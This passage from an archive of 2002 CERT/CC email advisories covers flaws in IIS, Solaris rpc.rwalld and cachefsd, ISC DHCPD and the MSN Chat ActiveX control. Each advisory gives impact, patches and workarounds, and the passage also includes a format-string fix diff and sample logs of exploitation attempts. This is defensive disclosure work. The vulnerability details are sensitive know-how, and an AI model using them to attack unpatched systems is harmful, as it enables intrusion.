vulnerable systems. We strongly encourage all sites running IIS to read Microsoft's advisory on these and other vulnerabilities and take appropriate action as soon as practical. Microsoft's bulletin is available at http://www.microsoft.com/technet/security/bulletin/MS02-018.asp Additional information about these vulnerabilities is available at http://www.kb.cert.org/vuls VU#363715 CAN-2002-0071 Microsoft Internet Information Server (IIS) vulnerable to heap overflow during processing of crafted ".htr" request by "ISM.DLL" ISAPI filter VU#883091 CAN-2002-0074 Microsoft Internet Information Server (IIS) contains cross-site scripting vulnerability in IIS Help Files search facility VU#886699 CAN-2002-0148 Microsoft Internet Information Server (IIS) contains cross-site scripting vulnerability in HTTP error page results VU#520707 CAN-2002-0075 Microsoft Internet Information Server (IIS) contains cross-site scripting vulnerability in redirect response messages VU#412203 CAN-2002-0073 Microsoft Internet Information Server (IIS) vulnerable to DoS via malformed FTP connection status request VU#454091 CAN-2002-0150 Microsoft Internet Information Server (IIS) vulnerable to buffer overflow via inaccurate checking of delimiters in HTTP header fields VU#721963 CAN-2002-0149 Microsoft Internet Information Server (IIS) buffer overflow in server-side includes (SSI) containing long invalid file name VU#521059 CAN-2002-0072 Microsoft Internet Information Server (IIS) vulnerable to DoS when URL request exceeds maximum allowed length VU#610291 CAN-2002-0079 Microsoft Internet Information Server (IIS) buffer overflow in chunked encoding transfer mechanism VU#669779 CAN-2002-0147 Microsoft Internet Information Server (IIS) buffer overflow in chunked encoding transfer mechanism II. Impact For many of the vulnerabilities, an intruder could execute arbitrary code with privileges that vary according to which version of IIS is running. In general, IIS 4.0 permits an intruder to execute code with complete administrative privileges, while IIS 5.0 and 5.1 permit an intruder to execute code with the privileges of the IWAM_computername account. III. Solution Microsoft Corporation has released Microsoft Security Bulletin MS02-018, which announces the availability of a cumulative patch to address a variety of problems. We strongly encourage you to read this bulletin and take the appropriate corrective measures. MS02-018 is available at http://www.microsoft.com/technet/security/bulletin/MS02-018.asp In addition to applying the patch, or until it can be applied, we recommend the following actions: * Use the IIS Lockdown tool and URLScan to eliminate or reduce the impact of some of these vulnerabilites; they may also eliminate or reduce other vulnerabilities that have not yet been discovered. The IIS Lockdown tool can also be used to disable ASP if it's not needed. More information about the IIS Lockdown tool and URLScan can be found at http://www.microsoft.com/technet/security/tools/locktool.asp http://www.microsoft.com/technet/security/URLScan.asp * As Microsoft has recommended for quite some time, disable the HTR ISAPI extension unless it is absolutely required. * Disable anonymous FTP unless it is required. * Don't give login credentials on IIS servers to untrusted users. _________________________________________________________________ Our thanks to Microsoft Corporation for the information contained in their advisory. Additionally, our thanks go to the various individuals and organizations whom Microsoft identified as discovering the vulnerabilities, including eEye Digital Security (http://www.eeye.com), Serge Mister of Entrust, Inc. (http://www.entrust.com), Dave Aitel of @Stake (http://www.atstake.com), Peter Grundl of KPMG, Joe Smith (jsm1th@hotmail.com) and zenomorph (admin@cgisecurity.com) of http://www.cgisecurity.com, Keigo Yamazaki of the LAC SNS Team (http://www.lac.co.jp/security/), and Thor Larholm of Jubii A/S. _________________________________________________________________ Author: Shawn V. Hernan ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2002-09.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2002 Carnegie Mellon University. Revision History April 11, 2002: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPLXddqCVPMXQI2HJAQG0+AP8CqkIjWiFgHY0WdWHeuDDoTt/ME76Qyxc hIqu0JY4NYwPgHa3t28g5kT216wgIBpI3A/B4iS/d0GXACsN/NFzMbHK7oyvSauS /ljHAfOFWsP8Uho6LQX/A9i4BV1gXDc5ThmCXormjgjcskyrQrRNRE8bSi6yY/kQ paZ74Dil6co= =qG95 -----END PGP SIGNATURE----- From - Wed May 1 12:33:08 2002 Return-Path: Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.11.4/8.11.4) with ESMTP id g41JWBt21765; Wed, 1 May 2002 12:32:12 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id OAA26395; Wed, 1 May 2002 14:22:54 -0400 (EDT) Date: Wed, 1 May 2002 14:22:54 -0400 (EDT) Received: by canaveral.red.cert.org; Wed, 1 May 2002 14:17:22 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2002-10 Format String Vulnerability in rpc.rwalld X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 223 Status: RO X-Status: X-Keywords: X-UID: 45 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2002-10 Format String Vulnerability in rpc.rwalld Original release date: May 1, 2002 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * Sun Solaris 2.5.1, 2.6, 7, and 8 Overview The rwall daemon (rpc.rwalld) is a utility that is used to listen for wall requests on the network. When a request is received, it calls wall, which sends the message to all terminals of a time-sharing system. A format string vulnerability may permit an intruder to execute code with the privileges of the rwall daemon. A proof of concept exploit is publicly available, but we have not seen active scanning or exploitation of this vulnerability. I. Description rpc.rwalld is a utility that listens for remote wall requests. Wall is used to send a message to all terminals of a time-sharing system. If the wall command cannot be executed, the rwall daemon will display an error message. An intruder can consume system resources and potentially prevent wall from executing, which would trigger the rwall daemon's error message. A format string vulnerability exists in the code that displays the error message. This vulnerability may permit the intruder to execute code with the privileges of the rwall daemon. This vulnerability may be exploited both locally and remotely, although remote exploitation is significantly more difficult. II. Impact An intruder can execute code with the privileges of the rwall daemon, typically root. III. Solution Apply a patch Appendix A contains information provided by vendors for this advisory. If a patch is not available, disable the rwall daemon (rpc.rwalld) in inetd.conf until a patch can be applied. If disabling the rwall daemon is not an option, implement a firewall to limit access to rpc.rwalld (typically port 32777/UDP). Note that this will not mitigate all vectors of attack. Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, please check the Vulnerability Note (VU#638099) or contact your vendor directly. Hewlett-Packard HP is not vulnerable. IBM IBM's AIX operating system, versions 4.3.x and 5.1L, is not susceptible to the vulnerability described. NetBSD NetBSD has never been vulnerable to this problem. Sun Microsystems Sun confirms that there is a format string vulnerability in rpc.rwalld(1M) which affects Solaris 2.5.1, 2.6, 7 and 8. However, this issue relies on a combination of events, including the exhaustion of system resources, which are difficult to control by a remote user in order to be exploited. Disabling rpc.rwalld(1M) in inetd.conf(4) is the recommended workaround until patches are available. Sun is currently generating patches for this issue and will be releasing a Sun Security Bulletin once the patches are available. The bulletin will be available from: http://sunsolve.sun.com/security Sun patches are available from: http://sunsolve.sun.com/securitypatch _________________________________________________________________ The CERT Coordination Center acknowledges "GOBBLES" as the discoverer of this vulnerability and thanks Sun Microsystems for their technical information. _________________________________________________________________ Feedback can be directed to the author: Jason A. Rafail ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2002-10.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2002 Carnegie Mellon University. Revision History May 1, 2002: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPNAuCKCVPMXQI2HJAQFPggP8CfV9uws6+YunrdNbxwEbKKopLCFRsL1Y Lk243wORHm3ocuWRWsqqWueaP/OuvG7lDS+0vOIsZlxUeKVZWWREUH8Lm2FMi3BB FRPTUWmjYqi3UcywqFnnZspXM+s9jL/fpRFBH1aqhIrpodB3+7HxqWEitll5vAJ4 c0WFy5v6S9k= =RnyP -----END PGP SIGNATURE----- From - Mon May 6 16:29:47 2002 Return-Path: Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.11.4/8.11.4) with ESMTP id g46NPhe25422; Mon, 6 May 2002 16:25:44 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id QAA18002; Mon, 6 May 2002 16:52:19 -0400 (EDT) Date: Mon, 6 May 2002 16:52:19 -0400 (EDT) Received: by canaveral.red.cert.org; Mon, 6 May 2002 16:46:46 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2002-11 Heap Overflow in Cachefs Daemon (cachefsd) X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 240 Status: RO X-Status: X-Keywords: X-UID: 46 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2002-11 Heap Overflow in Cachefs Daemon (cachefsd) Original release date: May 06, 2002 Last revised: Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * Sun Solaris 2.5.1, 2.6, 7, and 8 (SPARC and Intel Architectures) Overview Sun's NFS/RPC file system cachefs daemon (cachefsd) is shipped and installed by default with Sun Solaris 2.5.1, 2.6, 7, and 8 (SPARC and Intel architectures). A remotely exploitable vulnerability exists in cachefsd that could permit a remote attacker to execute arbitrary code with the privileges of the cachefsd, typically root. The CERT/CC has received credible reports of scanning and exploitation of Solaris systems running cachefsd. I. Description A remotely exploitable heap overflow exists in the cachefsd program shipped and installed by default with Sun Solaris 2.5.1, 2.6, 7, and 8 (SPARC and Intel architectures). Cachefsd caches requests for operations on remote file systems mounted via the use of NFS protocol. A remote attacker can send a crafted RPC request to the cachefsd program to exploit the vulnerability. Logs of exploitation attempts may resemble the following: May 16 22:46:08 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped May 16 22:46:21 victim-host last message repeated 7 times May 16 22:46:22 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Bus Error- core dumped May 16 22:46:24 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped May 16 22:46:56 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Bus Error - core dumped May 16 22:46:59 victim-host last message repeated 1 time May 16 22:47:02 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped May 16 22:47:07 victim-host last message repeated 3 times May 16 22:47:09 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Hangup May 16 22:47:11 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped According a Sun Alert Notification, failed attempts to exploit this vulnerability may leave a core dump file in the root directory. The presence of the core file does not preclude the success of subsequent attacks. Additionally, if the file /etc/cachefstab exists, it may contain unusual entries. This issue is also being referenced as CAN-2002-0085: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0085 The Australian Computer Emergency Response Team has also issued an advisory related to incident activity exploiting cachefsd: http://www.auscert.org.au/Information/Advisories/advisory/AA-2002.01.txt II. Impact A remote attacker may be able to execute code with the privileges of the cachefsd process, typically root. III. Solution Apply a patch from your vendor Appendix A contains information provided by vendors for this advisory. If a patch is not available, disable cachefsd in inetd.conf until a patch can be applied. If disabling the cachefsd is not an option, follow the suggested workaround in the Sun Alert Notification. Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, please check the Vulnerability Note (VU#635811) or contact your vendor directly. IBM IBM's AIX operating system, all versions, is not vulnerable. SGI SGI does not ship with SUN cachefsd, so IRIX is not vulnerable. Sun See the Sun Alert Notification available at http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F44309. _________________________________________________________________ The CERT/CC acknowledges the eSecurity Online Team for discovering and reporting on this vulnerability and thanks Sun Microsystems for their technical assistance. _________________________________________________________________ Feedback can be directed to the authors: Jason A. Rafail and Jeffrey S. Havrilla ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2002-11.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2002 Carnegie Mellon University. Revision History May 06, 2002: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPNbqwqCVPMXQI2HJAQHPBwP/ZElJx24KBdtWjqsaEv7qb9uFmA/5xOkc OgCZ/6EeXiEyK+D/faHAvttarxG5jABSrUnMjXI5aqa/3CaDmrMNnUKjYfxzt1GY TZFhLWUfE6F35sxRshLBwLmy88qkoZqLTqnWn/YqgCU+f8UUnqCIuVIxf2q1AgJj ExjXmDs3tbQ= =LUIX -----END PGP SIGNATURE----- From - Wed May 8 15:59:25 2002 Return-Path: Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.11.4/8.11.4) with ESMTP id g48KOF329910; Wed, 8 May 2002 13:24:15 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id NAA28573; Wed, 8 May 2002 13:34:04 -0400 (EDT) Date: Wed, 8 May 2002 13:34:04 -0400 (EDT) Received: by canaveral.red.cert.org; Wed, 8 May 2002 13:26:56 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2002-12 Format String Vulnerability in ISC DHCPD X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 246 Status: RO X-Status: X-Keywords: X-UID: 47 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2002-12 Format String Vulnerability in ISC DHCPD Original release date: May 8, 2002 Last revised:-- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * ISC DHCPD 3.0 to 3.0.1rc8 inclusive Overview The Internet Software Consortium (ISC) provides a Dynamic Host Configuration Protocol Daemon (DHCPD), which is a server that is used to allocate network addresses and assign configuration parameters to hosts. A format string vulnerability may permit a remote attacker to execute code with the privileges of the DHCPD (typically root). We have not seen active scanning or exploitation of this vulnerability. I. Description ISC's DHCPD listens for requests from client machines connecting to the network. Versions 3 to 3.0.1rc8 (inclusive) of DHCPD contains an option (NSUPDATE) that is enabled by default. NSUPDATE allows the DHCP server to send information about the host to the DNS server after processing a DHCP request. The DNS server responds by sending an acknowledgement message back to the DHCP server that may contain user-supplied data (like a host name). When the DHCP server receives the acknowledgement message from the DNS server, it logs the transaction. A format string vulnerability exists in ISC's DHCPD code that logs the transaction. This vulnerability may permit a remote attacker to execute code with the privileges of the DHCP daemon. II. Impact A remote attacker may be able to execute code with the privileges of the DHCPD (typically root). III. Solution Note that some of the mitigation steps recommended below may have significant impact on your normal network operations. Ensure that any changes made based on the following recommendations will not unacceptably affect any of your operations. Apply a patch from your vendor Appendix A contains information provided by vendors for this advisory. Disable the DHCP service As a general rule, the CERT/CC recommends disabling any service or capability that is not explicitly required. Depending on your network configuration, you may not need to use DHCP. Ingress filtering As a temporary measure, it may be possible to limit the scope of this vulnerability by blocking access to DHCP services at the network perimeter. Ingress filtering manages the flow of traffic as it enters a network under your administrative control. In the network usage policy of many sites, there are few reasons for external hosts to initiate inbound traffic to machines that provide no public services. Thus, ingress filtering should be performed at the border to prohibit externally initiated inbound traffic to non-authorized services. For DHCP, ingress filtering of the following ports can prevent attackers outside of your network from reaching vulnerable devices in the local network that are not explicitly authorized to provide public DHCP services. bootps 67/tcp # Bootstrap Protocol Server bootps 67/udp # Bootstrap Protocol Server bootpc 68/tcp # Bootstrap Protocol Client bootpc 68/udp # Bootstrap Protocol Client Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, please check the Vulnerability Note (VU#854315) or contact your vendor directly. Alcatel The security of our customers' networks is of highest priority for Alcatel. Alcatel is aware of this security issue in the DHCP implementation of ISC and has put measures in place to assess which of its products might be affected and to apply the necessary fixes where required. An update will be shortly published to provide more details on any affected products. Conectiva Conectiva Linux 8 ships dhcp-3.0 and is vulnerable to this problem. Updates will be available at our ftp site and an announcement will be sent to our mailing lists as soon as CERT publishes its advisory. F5 Networks, Inc. F5 Networks' products do not include any affected version of ISC's DHCPD, and are therefore not vulnerable. FreeBSD The FreeBSD base system does not ship with the ISC dhcpd server by default and is not affected by this vulnerability. The ISC dhcpd server is available in the FreeBSD Ports Collection; updates to the ISC dhcp port (ports/net/isc-dhcp3) are in progress and corrected packages will be available in the near future. IBM IBM's AIX operating system, all versions, is not vulnerable. Internet Software Consortium A patch is included below, and we have a patched version of 3.0 available (3.0pl1) and a new release candidate for the next bug-fix release (3.0.1RC9). Both of these new releases are not vulnerable. --- common/print.c Tue Apr 9 13:41:17 2002 +++ common/print.c.patched Tue Apr 9 13:41:56 2002 @@ -1366,8 +1366,8 @@ *s++ = '.'; *s++ = 0; if (errorp) - log_error (obuf); + log_error ("%s",obuf); else - log_info (obuf); + log_info ("%s",obuf); } #endif /* NSUPDATE */ Lotus Development Corporation This issue does not affect Lotus products. Microsoft Corporation Microsoft does not ship the ISC DHCPD program. NetBSD NetBSD fixed this during a format string sweep performed on 11-Oct-2000. No released version of NetBSD is vulnerable to this issue. Silicon Graphics, Inc. SGI is not vulnerable. _________________________________________________________________ The CERT Coordination Center acknowledges Next Generation Security Technologies as the discoverer of this vulnerability and thanks them and the Internet Software Consortium (ISC) for their cooperation, reporting, and analysis of this vulnerability. _________________________________________________________________ Feedback can be directed to the author: Ian A. Finlay ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2002-12.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2002 Carnegie Mellon University. Revision History May 8, 2002: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPNle2qCVPMXQI2HJAQEJ5gP/SKXwgQG1Z4Y+dQmAqGnHxYEZuKaPDuLB zLmkVcPQrpdo8DVDNpy3uMK1Mfro3RFLMg5mTON4noHiiIQb5M7iZPWXV5qnQNt3 s4ga8RseymwUvbNbdBo6x9EdjrM2+iQSrJHbVF0RXRvZT9zRAg+sfzHtGwEeHxQ3 XuLLU2DySLc= =Kvhw -----END PGP SIGNATURE----- From - Fri May 10 16:11:02 2002 Return-Path: Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.11.4/8.11.4) with ESMTP id g4AN1lk16488; Fri, 10 May 2002 16:01:48 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id QAA03628; Fri, 10 May 2002 16:38:05 -0400 (EDT) Date: Fri, 10 May 2002 16:38:05 -0400 (EDT) Received: by canaveral.red.cert.org; Fri, 10 May 2002 16:31:39 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2002-13 Buffer Overflow in Microsoft's MSN Chat ActiveX X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 252 Status: RO X-Status: X-Keywords: X-UID: 48 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2002-13 Buffer Overflow in Microsoft's MSN Chat ActiveX Control Original release date: May 10, 2002 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected Microsoft Windows systems with one or more of the following: * Microsoft MSN Chat control * Microsoft MSN Messenger 4.6 and prior * Microsoft Exchange Instant Messenger 4.6 and prior Overview Microsoft's MSN Chat is an ActiveX control for Microsoft Messenger, an instant messenging client. A buffer overflow exists in the ActiveX control that may permit a remote attacker to execute arbitrary code on the system with the privileges of the current user. I. Description A buffer overflow exists in the "ResDLL" parameter of the MSN Chat ActiveX control that may permit a remote attacker to execute arbitrary code on the system with the privileges of the current user. This vulnerability affects MSN Messenger and Exchange Instant Messenger users. Since the control is signed by Microsoft, users of Microsoft's Internet Explorer (IE) who accept and install Microsoft-signed ActiveX controls are also affected. The Microsoft MSN Chat control is also available for direct download from the web. The tag could be used to embed the ActiveX control in a web page. If an attacker can trick the user into visiting a malicious site or the attacker sends the victim a web page as an HTML-formatted email or newsgroup posting then this vulnerability could be exploited. This acceptance and installation of the control can occur automatically within IE for users who trust Microsoft-signed ActiveX controls. When the web page is rendered, either by opening the page or viewing the page through a preview pane, the ActiveX control could be invoked. Likewise, if the ActiveX control is embedded in a Microsoft Office (Word, Excel, etc.) document, it may be executed when the document is opened. According to the Microsoft Advisory (MS02-022): It's important to note that this control is used for chat rooms on several MSN sites in addition to the main MSN Chat site. If you have successfully used chat on any MSN-site, you have downloaded and installed the chat control. The CERT/CC has published information on ActiveX in Results of the Security in ActiveX Workshop (pdf) and CA-2000-07. This issue is also being referenced as CAN-2002-0155: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0155 II. Impact A remote attacker may be able to execute arbitrary code with the privileges of the current user. III. Solution Apply a patch from your vendor Microsoft has released a patch, a fixed MSN Chat control, and upgrades to address this issue. It is important that all users apply the patch since it will prevent the installation of the vulnerable control on systems that have not already installed it. Download location for the patch: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=38790 Download location for updated version of MSN Messenger with the corrected control: http://messenger.msn.com/download/download.asp?client=1&update=1 Download location for updated version of Exchange Instant Messenger with the corrected control: http://www.microsoft.com/Exchange/downloads/2000/IMclient.asp Microsoft also suggests that the following Microsoft mail products: Outlook 98 and Outlook 2000 with the Outlook Email Security Update, Outlook 2002, and Outlook Express will block the exploitation of this vulnerability via email because these products will open HTML email in the Restricted Sites zone. Other mitigation strategies include opening web pages and email messages in the Restricted Sites zone and using email clients that permit users to view messages in plain-text. Likewise, it is important for users to realize that a signed control only authenticates the origin of the control and does not imply any information with regard to the security of the control. Therefore, downloading and installing signed controls through an automated process is not a secure choice. Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, please check the Vulnerability Note (VU#713779) or contact your vendor directly. Microsoft See http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS02-022.asp _________________________________________________________________ The CERT/CC acknowledges the eEye Team for discovering and reporting on this vulnerability and thanks Microsoft for their technical assistance. _________________________________________________________________ Feedback can be directed to the author: Jason A. Rafail ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2002-13.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2002 Carnegie Mellon University. Revision History May 10, 2002: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPNws56CVPMXQI2HJAQGUUQP/ZsyoPxzyttkDCaqvD8V7fu/dWWyUFPrk qYTu2CUfZtuGdmpZ91sR8jWn3BAgEiIiF5sIXMckqjApNDORkLdt1sIo5ddkX4qR k1JO0sAiNITtUAXwx3vsv36EYCtL+JaX5jmMrZffZvxjM1PzbmxGD7NVOvtGQtGB MUEDOZLJe44= =TqFl -----END PGP SIGNATURE----- From - Tue May 28 13:23:01 2002 Return-Path: Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.12.3/8.12.3) with ESMTP id g4SJnaSQ012500; Tue, 28 May 2002 12:49:36 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id OAA23434; Tue, 28 May 2002 14:51:37 -0400 (EDT) Date: Tue, 28 May 2002 14:51:36 -0400 (EDT) Received: by canaveral.red.cert.org; Tue, 28 May 2002 14:46:04 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , 